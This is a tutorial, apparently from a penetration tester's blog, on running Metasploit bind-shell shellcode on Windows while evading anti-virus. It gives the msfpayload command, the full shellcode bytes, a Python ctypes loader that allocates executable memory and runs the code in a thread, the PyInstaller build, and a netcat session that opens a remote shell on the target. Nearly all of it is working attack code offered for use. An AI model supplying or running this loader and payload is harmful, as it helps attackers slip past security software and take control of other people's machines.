I am going to demonstrate a little trick to allow you to bypass anti-virus and execute shellcode, this is a publicly known trick that I did not discover. The shellcode I am going to use for this example is the common Metasploit Windows Bind TCP shell, however any shellcode can be used, I have simply chosen this one for simplicity.
As I’m sure you’re all aware, the standard Metasploit Windows Bind shell will be flagged by the most basic of anti-virus solutions.
So, first of all let’s generate a Metasploit payload:
root@kali:~# msfpayload windows/shell_bind_tcp LPORT=31337 C | grep -v 'unsigned' | grep -v '*' | sed s'/"//g' | sed s'/;//g' | tr "n" "," | sed s'/,//g' && echo "" xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x31xdbx53x68x02x00x7ax69x89xe6x6ax10x56x57x68xc2xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xffxd5x57x89xc7x68x75x6ex4dx61xffxd5x68x63x6dx64x00x89xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5 root@kali:~#
Copy the line of shellcode that gets returned, we will paste it into the binary later. Be aware, if you do change the payload the above command will not work as it is specific to that payload (for extracting the opcodes from the msfpayload output).
Now in order to do this you must have Python and PyInstaller installed. I will not cover how to install these as their respective sites do it well.
The following piece of Python code takes shellcode as input and moves it into the newly created memory space, finally executing it and bypassing anti-virus. Using VirtualAlloc, RtlMoveMemory, CreateThread and WaitForSingleObject we achieve this. Here is the Python code:
#!C:Python27python.exe
from ctypes import *
# Grab shellcode from the user so its not hardcoded.
sc = bytearray(input("Paste the shellcode inside single quotes:nn"))
print "nnRunning shellcode in memory...nn"
# Reserves or commits a region of pages in the virtual address space of the calling process.
pointer = windll.kernel32.VirtualAlloc(c_int(0),
c_int(len(sc)),
c_int(0x3000),
c_int(0x40))
buffer = (c_char * len(sc)).from_buffer(sc)
# The RtlMoveMemory routine copies the contents of a source memory block to a destination
# memory block, and supports overlapping source and destination memory blocks.
windll.kernel32.RtlMoveMemory(c_int(pointer),
buffer,
c_int(len(sc)))
# Creates a thread to execute within the virtual address space of the calling process.
ht = windll.kernel32.CreateThread(c_int(0),
c_int(0),
c_int(pointer),
c_int(0),
c_int(0),
pointer(c_int(0)))
# Waits until the specified object is in the signaled state or the time-out interval elapses.
windll.kernel32.WaitForSingleObject(c_int(ht), c_int(-1))
print "Completed, you're shellcode has been injected into memory and should be running..."
Take the above Python script and compile it to an win32 executable using PyInstaller:
C:Usersmike.evansDesktopAV>c:Python27Scriptspyinstaller.exe -F crypter2.py 82 INFO: wrote C:Usersmike.evansDesktopAVcrypter2.spec 117 INFO: Testing for ability to set icons, version resources... 247 INFO: ... resource update available 252 INFO: UPX is not available. 283 INFO: Processing hook hook-os 424 INFO: Processing hook hook-time 430 INFO: Processing hook hook-cPickle 510 INFO: Processing hook hook-_sre 667 INFO: Processing hook hook-cStringIO 780 INFO: Processing hook hook-encodings 799 INFO: Processing hook hook-codecs 1440 INFO: Extending PYTHONPATH with C:Usersmike.evansDesktopAV 1440 INFO: checking Analysis 1441 INFO: building Analysis because out00-Analysis.toc non existent 1441 INFO: running Analysis out00-Analysis.toc 1444 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable 1917 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ... 1918 INFO: Found manifest C:WindowsWinSxSManifestsx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest 1925 INFO: Searching for file msvcr90.dll 1927 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcr90.dll 1927 INFO: Searching for file msvcp90.dll 1928 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcp90.dll 1930 INFO: Searching for file msvcm90.dll 1930 INFO: Found file C:WindowsWinSxSx86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91msvcm90.dll 2058 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloader_pyi_bootstrap.py 2078 INFO: Processing hook hook-os 2102 INFO: Processing hook hook-site 2128 INFO: Processing hook hook-encodings 2260 INFO: Processing hook hook-time 2267 INFO: Processing hook hook-cPickle 2351 INFO: Processing hook hook-_sre 2500 INFO: Processing hook hook-cStringIO 2625 INFO: Processing hook hook-codecs 3140 INFO: Processing hook hook-pydoc 3322 INFO: Processing hook hook-email 3401 INFO: Processing hook hook-httplib 3461 INFO: Processing hook hook-email.message 3560 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_importers.py 3628 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_archive.py 3693 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_carchive.py 3752 INFO: Analyzing C:Python27libsite-packagespyinstaller-2.1-py2.7.eggPyInstallerloaderpyi_os_path.py 3763 INFO: Analyzing crypter2.py 3849 INFO: Hidden import 'codecs' has been found otherwise 3851 INFO: Hidden import 'encodings' has been found otherwise 3852 INFO: Looking for run-time hooks 4213 INFO: Using Python library C:Windowssystem32python27.dll 4450 INFO: Warnings written to C:Usersmike.evansDesktopAVbuildcrypter2warncrypter2.txt 4470 INFO: checking PYZ 4471 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing 4473 INFO: building PYZ (ZlibArchive) out00-PYZ.toc 5601 INFO: checking PKG 5604 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing 5605 INFO: building PKG (CArchive) out00-PKG.pkg 6776 INFO: checking EXE 6777 INFO: rebuilding out00-EXE.toc because crypter2.exe missing 6779 INFO: building EXE from out00-EXE.toc 6818 INFO: Appending archive to EXE C:Usersmike.evansDesktopAVdistcrypter2.exe
Now we have the binary, lets check VirusTotal and see what it scores:
Excellent, it passes all anti-virus checks. Let’s drop this binary onto the target machine and paste in the shellcode from earlier:
C:Usersmike.evansDesktopAVdist>crypter2.exe Paste the shellcode inside single quotes: 'xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8bx12xebx86x5dx68x33x32x00x00x68x77x73x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x31xdbx53x68x02x00x7ax69x89xe6x6ax10x56x57x68xc2xdbx37x67xffxd5x53x57x68xb7xe9x38xffxffxd5x53x53x57x68x74xecx3bxe1xffxd5x57x89xc7x68x75x6ex4dx61xffxd5x68x63x6dx64x00x89xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50x56x56x56x46x56x4ex56x56x53x56x68x79xccx3fx86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5' Running shellcode in memory...
Excellent, so the binary didn’t get flagged and it executed our shellcode in memory. If we try connecting to the target on port 31337 we should get a shell:
dustys-air:~ dusty$ nc 172.16.40.208 31337 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:Usersmike.evansDesktopAVdist>whoami whoami win-2q626uv3ptemike.evans C:Usersmike.evansDesktopAVdist>
This technique can be handy in certain situations where you just want to drop a payload and the darn AV keeps picking it up.